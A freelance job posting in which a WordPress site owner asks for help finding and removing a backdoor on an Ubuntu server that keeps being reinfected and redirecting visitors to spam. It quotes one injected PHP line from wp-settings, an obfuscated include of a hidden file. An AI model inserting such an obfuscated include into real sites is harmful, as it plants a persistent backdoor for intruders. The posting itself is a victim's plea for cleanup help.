Found/Close a backdoor on my server and clean it from spyware/spam ads

It's a wordpress website but I'm sure it's not a wordpress problem because even though every week I found my wp-settings, [login to view URL] modified with a code like this: <?php /*8f9e3*/ @include "\057home\057subm\141rin/\160ubli\143_htm\154/ima\147enes\057thum\142nail\163/.08\071c756\[login to view URL]"; /*8f9e3*/ I also keep finding a lot of [login to view URL] files with similar code on most of my folders. For instance in a simple image folder. I keep deleting the code, and [login to view URL] files and have made a full clean up, delete plugins, etc. and still i keep finding these files modified. I also have found they're creating folders on my server. So i think i have a backdoor open on my server that is causing it. This is causing that when I post a link on youtube it redirects to another spam website with some kind of bot ad. It's also happening when clicking on google results page. If you´re reading this please contact me with codeword: lucino Your task is simple: Find the backdoor, close it and tell me what to do for this stop happening, and of course clean my server. Server Specs: Ubuntu 18 running on digital ocean Webmin Installed 3 domains installed.